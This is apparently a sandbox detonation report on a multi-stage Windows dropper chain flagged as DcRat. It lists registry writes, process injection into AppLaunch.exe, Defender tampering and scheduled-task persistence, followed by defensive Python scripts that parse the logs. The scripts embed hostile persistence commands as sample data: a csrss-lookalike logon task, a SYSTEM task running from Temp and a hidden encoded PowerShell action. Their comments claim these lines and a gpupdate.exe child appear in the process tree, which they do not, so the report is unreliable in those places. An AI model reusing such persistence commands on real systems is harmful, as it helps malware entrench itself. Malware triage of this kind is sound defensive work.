\REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f97be1b6d006da01 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8a5376bcd006da01 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = 
"Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e7094cced006da01 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Discuz! 
MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content MicrosoftEdgeCP.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
3Pp48oh.exeAppLaunch.exeExplorer.EXEpid process 4260 3Pp48oh.exe 4260 3Pp48oh.exe 3804 AppLaunch.exe 3804 AppLaunch.exe 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXE
pid process
3260 Explorer.EXE
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process
608
-
Suspicious behavior: MapViewOfSection 26 IoCs
Processes:
3Pp48oh.exe MicrosoftEdgeCP.exe toolspub2.exe
pid process
4260 3Pp48oh.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
5712 toolspub2.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
AppLaunch.exeExplorer.EXEMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe8EC2.exedescription pid process Token: SeDebugPrivilege 3804 AppLaunch.exe Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeDebugPrivilege 964 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 964 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 964 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 964 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeDebugPrivilege 1756 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1756 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 
Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeDebugPrivilege 5152 8EC2.exe Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
Explorer.EXE
pid process
3260 Explorer.EXE
3260 Explorer.EXE
3260 Explorer.EXE
3260 Explorer.EXE
3260 Explorer.EXE
3260 Explorer.EXE
3260 Explorer.EXE
3260 Explorer.EXE
-
Suspicious use of SendNotifyMessage 45 IoCs
Processes:
Explorer.EXEpid process 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
MicrosoftEdge.exe MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe
pid process
3652 MicrosoftEdge.exe
4556 MicrosoftEdgeCP.exe
964 MicrosoftEdgeCP.exe
4556 MicrosoftEdgeCP.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exe, Yj1WX27.exe, vh4hc74.exe, nF6Lt05.exe, TN7Pe86.exe, Vy4Zf18.exe, 1Iz10bE7.exe, 2Hu0424.exe, 4LF780EA.exe, 5Ny9PH9.exe
description: pid / process wrote to memory of target pid / target process (the sandbox logs one row per WriteProcessMemory call; identical rows are collapsed here with the call count in parentheses)
- PID 680 file.exe wrote to memory of PID 520 Yj1WX27.exe (3)
- PID 520 Yj1WX27.exe wrote to memory of PID 3444 vh4hc74.exe (3)
- PID 3444 vh4hc74.exe wrote to memory of PID 1344 nF6Lt05.exe (3)
- PID 1344 nF6Lt05.exe wrote to memory of PID 2228 TN7Pe86.exe (3)
- PID 2228 TN7Pe86.exe wrote to memory of PID 2960 Vy4Zf18.exe (3)
- PID 2960 Vy4Zf18.exe wrote to memory of PID 2996 1Iz10bE7.exe (3)
- PID 2996 1Iz10bE7.exe wrote to memory of PID 3804 AppLaunch.exe (8)
- PID 2960 Vy4Zf18.exe wrote to memory of PID 2544 2Hu0424.exe (3)
- PID 2544 2Hu0424.exe wrote to memory of PID 940 AppLaunch.exe (3)
- PID 2544 2Hu0424.exe wrote to memory of PID 3908 AppLaunch.exe (10)
- PID 2228 TN7Pe86.exe wrote to memory of PID 4260 3Pp48oh.exe (3)
- PID 1344 nF6Lt05.exe wrote to memory of PID 1012 4LF780EA.exe (3)
- PID 1012 4LF780EA.exe wrote to memory of PID 3012 AppLaunch.exe (8)
- PID 3444 vh4hc74.exe wrote to memory of PID 5032 5Ny9PH9.exe (3)
- PID 5032 5Ny9PH9.exe wrote to memory of PID 4224 explothe.exe (3)
- PID 520 Yj1WX27.exe wrote to memory of PID 2320 6Kg3IZ2.exe (3)
-
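The table above lists one row per WriteProcessMemory call, and the report flattens those rows onto a single line. The Python below is an added example, not part of the sandbox report or of any tool it names: it parses rows in exactly that flattened form, collapses them per writer/target pair, and flags the pairs that look like process hollowing (a dropped loader writing repeatedly into a freshly started AppLaunch.exe, which matches the "Suspicious use of SetThreadContext" signature on the same parents). The sample rows are copied from this report; the host watch-list and the three-row baseline for an ordinary launch are assumptions derived from this report, not sandbox constants.

```python
import re
from collections import Counter

# Rows from this report's "Suspicious use of WriteProcessMemory" table (constructed sample
# input; the (row, count) pairs reproduce how often each row appears in the report).
_ROWS = [
    ("PID 680 wrote to memory of 520 680 file.exe Yj1WX27.exe", 3),
    ("PID 2996 wrote to memory of 3804 2996 1Iz10bE7.exe AppLaunch.exe", 8),
    ("PID 2544 wrote to memory of 940 2544 2Hu0424.exe AppLaunch.exe", 3),
    ("PID 2544 wrote to memory of 3908 2544 2Hu0424.exe AppLaunch.exe", 10),
    ("PID 1012 wrote to memory of 3012 1012 4LF780EA.exe AppLaunch.exe", 8),
    ("PID 5032 wrote to memory of 4224 5032 5Ny9PH9.exe explothe.exe", 3),
]
# The report runs all rows together on one line, so the sample is flattened the same way.
SAMPLE_TABLE = " ".join(row for row, n in _ROWS for _ in range(n))

# One row: "PID <src> wrote to memory of <dst> <src> <src image> <dst image>".
# \s+ between tokens also copes with rows that were wrapped across lines by extraction.
ROW_RE = re.compile(
    r"PID\s+(?P<src>\d+)\s+wrote to memory of\s+(?P<dst>\d+)\s+(?P<src2>\d+)\s+"
    r"(?P<src_img>\S+)\s+(?P<dst_img>\S+)"
)


def parse_writes(table_text):
    """Collapse the per-call rows into {(src_pid, src_image, dst_pid, dst_image): calls}."""
    edges = Counter()
    for m in ROW_RE.finditer(table_text):
        if m["src"] != m["src2"]:  # the third number repeats the writer's pid; skip garbled rows
            continue
        edges[(int(m["src"]), m["src_img"], int(m["dst"]), m["dst_img"])] += 1
    return edges


# Microsoft-signed binaries that commodity loaders routinely start suspended and overwrite
# (assumed watch-list; extend it with whatever your environment sees hollowed).
HOLLOW_HOSTS = {"applaunch.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe",
                "installutil.exe", "vbc.exe", "csc.exe", "jsc.exe", "aspnet_compiler.exe"}

# In this report every plain parent->child launch shows exactly three rows; more than that
# means the parent kept writing into the child after creating it. Assumption: calibrate
# this per sandbox, since the count depends on how process creation is hooked.
BASELINE_WRITES = 3


def flag_injection(edges):
    """Return the writer/target pairs that look like hollowing, each with its reasons."""
    findings = []
    for (src, src_img, dst, dst_img), n in sorted(edges.items()):
        reasons = []
        if n > BASELINE_WRITES:
            reasons.append(f"{n} writes, more than the {BASELINE_WRITES} seen for a plain launch")
        if dst_img.lower() in HOLLOW_HOSTS:
            reasons.append(f"target {dst_img} is a commonly hollowed signed host")
        if reasons:
            findings.append({"writer": (src, src_img), "target": (dst, dst_img),
                             "writes": n, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in flag_injection(parse_writes(SAMPLE_TABLE)):
        print(f"{f['writer'][1]} (pid {f['writer'][0]}) -> {f['target'][1]} "
              f"(pid {f['target'][0]}): " + "; ".join(f["reasons"]))
```

On this report's rows the loader-to-explothe.exe and stager-to-stager edges stay at the three-write baseline and are not flagged, while every AppLaunch.exe target is, including the one with only three writes (flagged on the host name alone), which is why both heuristics are kept.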
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
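Several tasks in the process tree below are created through schtasks.exe: a one-minute watchdog for explothe.exe, an ONLOGON task named csrss that runs at the highest level, a one-shot task whose action is a hidden PowerShell -EncodedCommand, and a SYSTEM task pointing into the user's Temp directory. The Python below is an added example, not part of this report or of any tool it names: it tokenises those command lines, extracts the verb, task name, trigger, account and action, decodes an -EncodedCommand action (base64 of UTF-16LE) and applies a few triage heuristics. The sample command lines are copied from this report; the lookalike-name list, the user-writable path list and the simplified argument splitter are assumptions.

```python
import base64
import re

# Command lines copied from the process tree in this report (constructed sample input).
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r'schtasks /CREATE /TN "gBWIJtiSe" /SC once /ST 04:01:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 23:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\tJYzbog.exe\" 3Y /tIsite_idILE 385119 /S" /V1 /F',
    r'schtasks /delete /tn ScheduledUpdate /f',
]

VERBS = {"/create", "/delete", "/run", "/end", "/query", "/change"}
VALUE_FLAGS = {"/sc", "/mo", "/tn", "/tr", "/st", "/sd", "/ru", "/rp", "/rl", "/ri", "/du", "/xml"}


def split_windows_args(cmdline):
    """Minimal CommandLineToArgvW-style splitter (assumption: simplified). Whitespace
    separates arguments, double quotes group them, and a backslash-escaped quote is kept
    literally; runs of several backslashes before a quote are not modelled."""
    args, cur, quoted, i = [], [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "\\" and cmdline[i + 1:i + 2] == '"':
            cur.append('"')
            i += 2
            continue
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
        i += 1
    if cur:
        args.append("".join(cur))
    return args


def parse_schtasks(cmdline):
    """Return {"verb": ..., "opts": {...}} for a schtasks command line, or None."""
    args = split_windows_args(cmdline)
    if not args or "schtasks" not in args[0].lower():
        return None
    task = {"verb": None, "opts": {}}
    i = 1
    while i < len(args):
        key = args[i].lower()
        if key in VERBS and task["verb"] is None:
            task["verb"] = key[1:]
        elif key in VALUE_FLAGS and i + 1 < len(args):
            task["opts"][key[1:]] = args[i + 1]
            i += 1
        elif key.startswith("/"):
            task["opts"][key[1:]] = True  # boolean switch such as /F or /V1
        i += 1
    return task


# -e, -enc and -EncodedCommand all introduce the base64 blob.
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(text):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE) found in text."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Assumed lists: paths a standard user can write to, and names that imitate OS components.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
LOOKALIKE_NAMES = ("csrss", "svchost", "lsass", "winlogon", "explorer", "googleupdate")


def assess(task):
    """Triage heuristics for a /Create: where it runs from, how often, as whom, what it hides."""
    reasons = []
    if not task or task["verb"] != "create":
        return reasons
    o = task["opts"]
    opt = lambda k: str(o.get(k, "")).lower()
    action, name = str(o.get("tr", "")), str(o.get("tn", ""))
    if any(p in action.lower() for p in USER_WRITABLE):
        reasons.append("action runs from a user-writable path")
    if opt("sc") == "minute" and opt("mo") == "1":
        reasons.append("fires every minute (watchdog-style persistence)")
    if opt("ru") == "system" or opt("rl") == "highest":
        reasons.append("runs as SYSTEM or at highest run level")
    if any(n in name.lower() for n in LOOKALIKE_NAMES):
        reasons.append(f"task name {name!r} mimics a system component")
    decoded = decode_encoded_command(action)
    if decoded is not None:
        reasons.append(f"encoded PowerShell action decodes to: {decoded}")
    elif "powershell" in action.lower() and "hidden" in action.lower():
        reasons.append("hidden PowerShell action")
    return reasons


def triage(cmdlines):
    """(task name, reasons) for every /Create in the list; other verbs are skipped."""
    out = []
    for line in cmdlines:
        task = parse_schtasks(line)
        if task and task["verb"] == "create":
            out.append((str(task["opts"].get("tn", "?")), assess(task)))
    return out


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_CMDLINES):
        print(name, "->", "; ".join(reasons) or "nothing flagged")
```

The encoded action in the gBWIJtiSe task decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`, which is exactly the gpupdate.exe child visible further down the tree. The GoogleUpdateTaskMachineQC task is registered through PowerShell's Register-ScheduledTask (with a schtasks fallback for pre-Windows 8 hosts) and would need its own parser.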
Processes
(depth in brackets; "cmd:" is shown only where the logged command line differs from the image path)
[1] C:\Windows\Explorer.EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
  [2] C:\Users\Admin\AppData\Local\Temp\file.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\file.exe"
      - DcRat
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Yj1WX27.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vh4hc74.exe
          - Executes dropped EXE
          - Adds Run key to start application
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nF6Lt05.exe
            - Executes dropped EXE
            - Adds Run key to start application
            - Suspicious use of WriteProcessMemory
          [6] C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TN7Pe86.exe
              - Executes dropped EXE
              - Adds Run key to start application
              - Suspicious use of WriteProcessMemory
            [7] C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Vy4Zf18.exe
                - Executes dropped EXE
                - Adds Run key to start application
                - Suspicious use of WriteProcessMemory
              [8] C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Iz10bE7.exe
                  - Executes dropped EXE
                  - Suspicious use of SetThreadContext
                  - Suspicious use of WriteProcessMemory
                [9] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                    - Modifies Windows Defender Real-time Protection settings
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
              [8] C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Hu0424.exe
                  - Executes dropped EXE
                  - Suspicious use of SetThreadContext
                  - Suspicious use of WriteProcessMemory
                [9] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                [9] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                  [10] C:\Windows\SysWOW64\WerFault.exe
                       cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 568
                       - Program crash
            [7] C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Pp48oh.exe
                - Executes dropped EXE
                - Checks SCSI registry key(s)
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious behavior: MapViewOfSection
          [6] C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4LF780EA.exe
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        [5] C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ny9PH9.exe
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory
          [6] C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
              cmd: "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
              - Executes dropped EXE
            [7] C:\Windows\SysWOW64\schtasks.exe
                cmd: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
                - DcRat
                - Creates scheduled task(s)
